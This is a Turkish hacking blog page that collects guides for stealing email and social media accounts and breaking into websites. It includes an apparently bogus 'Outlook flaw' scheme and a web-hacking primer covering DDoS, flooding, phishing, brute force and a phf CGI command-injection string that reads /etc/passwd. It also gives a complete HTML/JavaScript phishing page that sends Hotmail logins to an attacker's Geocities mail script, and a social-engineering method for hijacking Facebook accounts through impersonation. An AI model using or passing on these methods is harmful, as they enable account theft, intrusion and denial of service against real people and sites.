Programsız Mail Hackleme!


Merhaba arkadaşlar bugün sizlere uzun süredir üzerinde durduğumuz mail açığını anlatacağız.

Bu sistemde bilmeniz gereken tek şey çalacağınız yani hacklemek istediğiniz e-posta.

Programsız olan bu yöntem outlook ekibinin bir açığından ibarettir. Umarım bu açık bulunup kapanmaz. Sizde elinizi çabuk tutun ne olur ne olmaz :)

Şimdi size adımları tek tek anlatacağım öncellikle kullandığımız e-posta ile aşağıda ki e-posta adresine size vereceğim maili atacaksınız.

e-postareplacement@outlook.com.tr

Bu e-posta adresi size e-posta bilgilerinizin transfer etmenizi yani karşı tarafla değiştirmenizi

sağlıyor.

Açıkçası bende anlamış değilim neden böyle bir sistem yapmış outlook hiçbir fikrim yok.

Tek bildiğim şey varsa o da bu sistemi uzun süre tutmamalılar.

Şimdi bu e-posta atacağınız mail;

Merhaba,

Bundan 1 hafta önce çalınmış olan e-posta adresim içerisinde kişisel ve önemli bilgilerim

mevcuttu. Bu bilgileri şuan kullanmış olduğum e-posta adresime transfer etmek istiyorum.

İyi günler.

Konu Başlığını Hesap Bilgileri Transferi yapın.

Evet bu maili gönderdikten sonra 24 saat içerinde bize geri dönüş yapılacaktır eğer

onay görürse isteğiniz size doldurmanız için bir form maili göndericeklerdir. Bu mail içerisinde

sizin sözde eski e-posta adresinizi yani çalmak istediğiniz e-posta adresini girmenizi

isteyeceklerdir sizden ardından transfer yapılacak bilgiler. Formu doldurduktan sonra

gönderiyoruz ve 12 saat içerisinde size çalmak istediğiniz e-posta adresinin bilgilerini

kullanmış olduğunuz e-posta adresi ile değiştirilmiştir diyen bir mail alacaksınız.


Bu Açığı Yaymamaya Dikkat Edin


Yoksa Sistem Kapanır!

Yeniler İçin Bir Web Hack Makalesi



ACEMİLER İÇİN WEB HACK MAKALESİ

1. KURAL : BİR HACKER YADA SALDIRGAN YADA CRACKER KESİNLİKLE SİHİRBAZ YADA BÜYÜCÜ DEĞİLDİR.HACKER EĞER SİSTEMDE AÇIK VARSA O SİSTEME GİREBİLİR.
2. KURAL : GÜVENLİK İÇİNDE GARANTİ YOKTUR.
3. KURAL : TAMAMEN GÜVENLİ SİSTEM DİYE BİR ŞEY YOKTUR.
4. KURAL : EĞER HACKER OLMAK İSTİYORSANIZ EN UFAK BİLGİYİ BİLE OKUYUN. BU BİLGİ GÜNÜN BİRİNDE GELİR ÇOK İŞİNİZE YARAR.
5. ALTIN KURAL : SİSTEM HAKKINDA KESİNLİKLE BİLGİ EDİNİN.

WEB SİTESİ HACKLEMENİN YOLLARI
A.DDOS
B.FLOOD
C.DOMAİN HACK
D.HOST HACK
E.FTP HACK
F.KOD AÇIKLARI
G.DB HACK
H.ŞİFRE KIRMA
İ.PROGRAMLAR

WEB HACKİNG DÖKÜMANIMIZA BAŞLIYORUZ

İsterseniz dokümanımıza en kolay web hack yöntemleri olan hat da hack yöntemi olarak değil de siteyi yayından düşürme görevini üstlenmiş DDos ile başlayalım.

DDos: DDos un amacı herhangi bir sitenin yayınına engel olmaktır.DDos veri tabanı kullanan sitelerde daha fazla etki yapar.Örneğin site php ise mysql site asp ise mdb veri tabanını kullanır.DDos siteye her saniye de bir kullanıcı sokarak veritabanı nın sesionlarını karıştırır ve site iner.Burada ufak bir şey söyleyeyim bu bir yöntem örneğin siz herhangi bir siteye DDos saldırı yapacaksınız.DDos un etkili olabilmesi için sizin bağlantı hızınızın iyi olması gerekir.Bağlantı hızınız iyi değilse siz de DDos yaparken http://www.sitenick.com/index.php gibi bir uzantı kullanırsanız daha iyi olur.Bu durumda sitenin index ini sapıttırırsınız.Sitedeki index bozulur.Şöyle bir hata veriyordu yanlış hatırlamıyorsam &l8220;Genel hata&l8221; gibi bir hata veriyor..

FLOOD: Veritabanı kullanan bir sitenin veritabanını doldurarak bozulmasına ve sitenin çalışmamasına yol açar. Örneğin Denyo ile bir foruma sürekli üye kaydı yaparak veritabanının bozulmasına yol açabilirsiniz.

DOMAİN HACK: Domain hack ikin genel olarak iki yol vardır.Bunlardan birisi Siteye whois çekerek admin mailini öğrenmek ve maili çalmak tır.Diğeri ise sitenin kayıtlı olduğu domain şirketinin db sini elegeçirmektir.
a.Admin mail hack: Admin mail hack için sakın gizli soru tahmini kullanmayın. Çünkü eğer gizli soru tahmin ettiğin zaman eğer şifreyi değiştiriyorsanız bunun hiçbir önemi yok.Zaten bizim mail hackteki amacımız mail şifresini mailinin sahibinin koyduğu şekilde bulmaktır.Bunun bir çok yolu var önce bir whois le admin in mailini öğreneceğiz. Sonra eğer edinebiliyorsak admin hakkında bilgi edineceğiz. Admin eğer fake yiyecek kadar salaksa (hiç sanmam) ben olsam fake yollardım. Ama yollayacağım fake domain şirketinin üye giriş sayfası gibi olmalı ve mail aracılığı ile uygun bir mail adresi ile yollanmalı. Buna admin inanmalı.
Eğer admin hakkında bilgi toplayabildiyseniz kendinize göre bir dictionary oluşturun. Ve saldırı yapın. Dictionary admin hakkında topladığımız bilgilere göre yapacağız ama nasıl? Admin hakkında nerede oturduğunu felan altık hangi şehir kaç yaşında doğmuş vb vb vb. Admin zannediyorum oturduğu apartmanın adını koymaz. Sizde dictionary hazırlarken buna dikkat ediniz adam ******nun adını koyabilir büyük küçük harfle karışık koymuş olabilir ve benzeri. Siz böyle bir dictionary hazırlamalısınız.
Brute force : Bu yöntem genellikle bana göre pek başarılı olmamıştır. Gine de şifre kombineleri ile saldırıp kırabiliriz. Eğer şanslıysan kısa zamanda kırabilirsin.
b.Ayrıca başka bir yöntemde domainin kayıtlım olduğu sitenin db sini ele geçirmektir.

HOST HACK : Eğer hotsu hack etmek istiyorsak öncelikle sistemin nasıl çalıştığını ve sistem hakkında bilgiler edinmemiz gerekir. Sistemin çalışma şekli zaten genelde iki şekildedir. Windows ve Linux.

a. Windows : şimdi burada ufak bir ayrıntıya değinmek istiyorum. Eğer site asp ise Windows server ISS üzerine kuruludur. Eğer site php ise o zaman Linux da apache üzerine kuruludur. Eğer sitenin server i ISS 4.0 yada bunun altı ise o zaman sitede msdac.dll açığı vardır. O zaman perl de whisker exploitini derleyip çalıştıralım sonuca ulaşacağız. Eğer server ISS 4.0 ın üstünde bir serverse o zaman sitede kod açıkları bulmamız gerekecektir. Bunu n-stealth adlı programla yapabiliriz.Eğer açık bulursanız dalarsınız.Eğer dalınacak gibi bir açık değilse ve risk seviyesi yüksek ise o zaman o açığın exploiti vardır. Explotiti bulup derleyin çalıştırın sonuca ulaşacaksınız. Eğer risk seviyesi yüksek bir açık bulamadı iseniz o zaman domain hackte olduğu gigib bir wordlist hazırlayıp admin şifresini kırmaya çalışınız yada ftp şifresini kırmaya çalışınız.
b. Linux : Sitede bu durumda php oluyor. Eğer site php ise o zaman eski yöntemlerden yeni yöntemlere doğru bir deneme yapın eski bir yöntem olan / /ETC açığına bakın. Eğer varsa içinde mutlaka password.bak dosyası vardır onu alın ve kırın.

========================/ETC=========================== =
Selamlar... Bu yazıda daha basit ama daha hızlı bir hack yöntemini anlatacağım
Bu yöntem çok hoşunuza gidecek Gerekli Programlar : Internet Explorer
haricinde bir web browser, Cracker Jack ve tabiki Meliksah Ozoral&l039;s Dict Maker.
--------------------------------------
Mantık : phf sistemlerde bulunan bir açıktır ve bu acık sayesinde sisteme
web uzerinden baglanip shellde bazi komutlari calistirabilirsiniz...
Not : Calistirdiginiz komutlar cd, ls, cat gibi komutlar silme islemlerini
phf uzerinden yapamiyorsunuz...
--------------------------------------
Ozellikler : phf sayesinde her hangi bir serverdan elinizde acc olmadan
passwd dosyasini alabilir ve kirabilirsiniz...Bu olay web uzerinden
olur ve hizli olur |~ eNJOy!
--------------------------------------
Kullanim : phf nin kullanimi basitdir, sizi fazla zorlamaz. browsera girdiginiz adresin sonu asagidaki
satiri yazarsaniz "passwd" dosyasini browser penceresinde gorursunuz...
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Bu satirin mantigi sudur...
Asagidaki satir phf olayini acar.../cgi-bin/phf?Qalias=x%0a
Bu satirdan sonra yazacaginiz komutlarsistem uzerinde calistirilir...
ornegin :
cat%20/etc/passwd
etc dizinin altindaki passwd dosyasini goruntuler burda %20 bosluk oldugunu
belirtir yani :/cgi-bin/phf?Qalias=x%0als yazarsaniz bulundugunuz dizindeki dosyalar
goruntulenir.../cgi-bin/phf?Qalias=x%0als%20pass*
yazarsaniz bulundugunuz dizinde pass ile baslayan butun dosyalari listeler...
Komutun Kullanimi Kolay!
Simdi Biraz Ornek Cozelim!
--------------------------------------
=========================/ETC=========================== ===

Eğer bu açık yoksa sizde cgi/phf?qalias (cgi açıkları) yollarını deneyin. Açığı bulursanız bu yollarsa siteye girebilirsiniz. Cgi açıkları bulun. Eğer giremediyseniz brute force kullanın buda olmadı ise gine n-stealth ile bi açık taraması yaptırın ve risk seviyesi yüksek bir açık bulursanız exploit ini bulun ve derleyip çalıştırın. Sonuca ulaşın.

FTP HACK : Sitenin ftp adresini bulun ve bir brute yada dictionary ile saldırın belki kırarsınız. Ben böylelikle site hackledim.

KOD AÇIKALRI : Siteyi n-stealth la taratın ve açık arayın gine risk seviyesi yüksek açık bulursanız exploitini bulun. Cgi açıkları deneyin. Cgi açıkları html siteler içinde işe yarar. Programlama dili öğrenin. Siteler için her zaman bulunan açıklardan haberdar olun. Kendi açığınızı kendiniz bulmaya çalışın. Deneyin. Ör asp sitelerde or açığı bunun gibi açıklar bulun. Fso açıkları bunları deneyin.

DB HACK : Sitenin herhangi bir yolla db sine ulaşmaya çalışın ve db ye ulaşınca şifreyi kırın hiç denemedim ama bir deneyin siteyi herhangi bir programla pc nize indirin ve belki içinde db vardır bulursunuz. Google ile hack yapabilirsiniz. Site hakkında bilgi topladınız bu önemli idi aynı siteden sizde kurun ve db sinin yerini öğrenin buda iyi bir hacking yöntemidir..
======google======
İnurl:&l8221;db.mdb&l8221; gibi googlede aratın
======google======

ŞİFRE KIRMA : Herhangi bir programla yada mantığınız la admin mailini db nin şifresini admin giriş panelinin şifresini ve bunun gibi şeylerin şifresini kırın. Örnek verecek olursak unsecure ile şifre kırabilirsiniz.

PROGRAMLAR : Herhangi bir programla örneğin mass scanner ile herhangi bir hotsa bağlanın ve teker teker siteleri indirin. !

Programsız Bilgisayar Şifresi Kırma



- Bilgisayarı kapatıp tekrar açın.

-Siyah ekranda F8 tuşuna basın.
-Gelen ekrandan; "Güvenli Mod"u seçin.
-Görev yöneticisini açma komutlarını uygulayın. (CTRL + ALT + DELETE/DEL) 
-Karşınıza gelen kullanıcı seçim ekranından; "Administrotör"u seçin ve parolamı kaldır'a tıklayın.



Microsoft Windows XP'de Denenmiştir, Diğer İşletim Sistemlerinde Kesin Sonuçlar Vermeyebilir.

Hotmail Hesap Çalma !


1.ADIM
hotmail.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.

2.ADIM:
Geocities.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.1.adimda e-mail adresini kullandik.ve geocities'ten bir e-mail adresi aldik.örnegin(ybwc@geocities.com).

3.ADIM:
NotePad'imizi aciyoruz ve asagidaki text'i yaziyoruz. Daha sonra message.htm ismini verip kayit ediyoruz. Satir 17'de Geocities kullanici adimiz yaziyor. (ybwc) 2.adimda belirttigimiz gibi. (bu kullanici adini kendinize göre degistirin.)

<html><head></head><body>
<
p>"Go where you want today" Blue Adept</p>
<
script>
function 
getmess(){
return 
"<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +"<tr valign=middle>" +"<th colspan=2>" +"<font Helvetica" size="5">" +
"
We're Sorry, We Cannot
Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font Helvetica" size="3">Reason:&nbsp;</font>" +
"<font Helvetica" size="3" color="#ff0000">Time expired. Please re-login.</font>
" +
"<font Helvetica" size="2">(Get more info regarding error messages here)</font>" +
"</td></tr>" +
"<tr valign="middle"><td align="center">" +
"<FORM METHOD=POST ACTION="http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc" target="_top">" +
"<INPUT TYPE="hidden" NAME="next-url" VALUE="http://www.hotmail.com">" +
"<INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password">" +
"<table cellpadding="0" cellspacing="5" border="0">" +
"<tr><td><font Helvetica" size="2">Login Name:</font>
<input type="text" name="login" size="16" maxlength="16"></td><td><font Helvetica" size="2">Password:</font>
<input type="password" name="passwd" size="16" maxlength="16">&nbsp;<input type="submit" value="Enter"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font Helvetica" size="3">" +
"Return to <a href="http://welcome.to/www.hotmail.com" target="_parent">Hotmail'
s Homepage[/url]." +
"
</font></th></tr></table>" +
"
<p><img src="http://209.1.112.251/c9698.gif" width=189 height=16 border=0 alt="Copyright 1996-1997">";
}
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links.target="
work";
top.submenu.document.links.href="
javascript:getmess()";
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links.target="
work";
top.work.document.links.href="
javascript:getmess()";
}
</script>
</body>
</html> 



4.ADIM
kurbanizima yeni bir e-mail mesaji hazirlayip gönderiyoruz.örnegin: kurban, (victim@hotmail.com)olsun. E-mailimize message.htm dosyasinida ekliyoruz ve gönderiyoruz.

5.ADIM
Kurbanimizin e-mailini kontrol etmesini bekliyoruz. Kurban bizim e-maili görüntüledigi zaman Geocities'teki mailimizi kontrol ediyoruz. Geocities2ten bir mail aliyoruz. Tabii bu mail'de kurbanimizin kullanici adi, sifresi ve ip adresi oluyor...

Facebook Hesap Çalma

Evet arkadaşlar şimdi size facebook sosyal mühendislikle hesap çalmayı göstericem bu yöntemi paylaşan varmı bilmiyorum varsada göremedim kusura bakmayın

Hemen başlayalım şimdi herkez formbuddyden fake yapmayı bilyodur ama bunu linke koyduğumuzda ya internet bu link kötü amaçlı diyodur yada antivir hemen uyarı veriyodur.


NOT : Formbuddy ile fake facebook yapmayı bilmeyenler için http://www.turkhackteam.net/web-server-guvenligi/680465-fake-facebook-yada-fake-site-yapmak.html



*Şimdi kurbanımızı seçdik hemen profil bilgilerine bakıyoruz öncelikle aile kısmına bakıyoruz çünkü kankası güvendiği kişiyi aileye ekler çoğumuz orda bişey bulamadıysak paylaşımlarına ve altındaki yorumlara beğenilere bakıyoruz biri ona knk felan diye yorumlar yapdıysa o onun güvendiği kişidir yorumda yoksa beğenilere bakıyoruz en çok kim adamın paylaşımları beğenmiş bakarız burdanda sonuç yoksa artık adamın arkadaşlarından tabi erkekse bi güzel arkadaşını alıyoruz (kız sonuçda güvenir)
Neyse şimdi onun knksini belirledik diyelim biz fake bi hesap açıyoruz adını o adamın knksi yapıyoz ve profil resminide o knksinin profil resmi yapıoz ve o knksinin kopyası olduk aynı şimdi fake.html oluyodur herkezde heralde fake htmlmiz onu adama ne diye yutturcaksak artık atıyom hile.html adama hile paylaşır gibi veya güzelsöz.html adama knk bu söz çok hoşuma gitti dicez ve face mesaj atmada dosya ekle var oradan htmlmizi eklicez ve adama yollıcaz tabi adam knksi sandığı için bizi durumu çakmıcak indircek html tıklıcak ve artık facebook tekar giriş yapmı yaparsınız hotailmi size kalmış adam girdiği zaman ben zaten facede değilmiyim niye bida soruyo dicek neyse giriyim dicek gircek ve fakenizdeki msnde adamın id şifre elinizde umarım karışık olmamışdır uzun oldu biraz ama herşeyi açıklamayı çalışdım

Bu arada formbuddyde alırken oraya ilk başta www.facebook.com yazmayın çünkü öyle yazarsanız hemen face şifreni değiştir diye adama uyarı verir atıyom güzel sözse bi siteden güzel söz varsa o sitenin güzel söz sayfasının linki yazın böylece facebook durumu çakmaz yani anlıcağınız fakenizde facebookla ilgili bişey geçmesin formbuddydeki o kodu alıyoz fake htmlye yazıoz ya head body arasına işde o head body arasındaki formbuddy kodunda yazmasın facebook.com veya facebookun herhangi bişeyi





Teşekkür Eden Elleriniz Şimdiden Dert Görmesin
Powered by Blogger.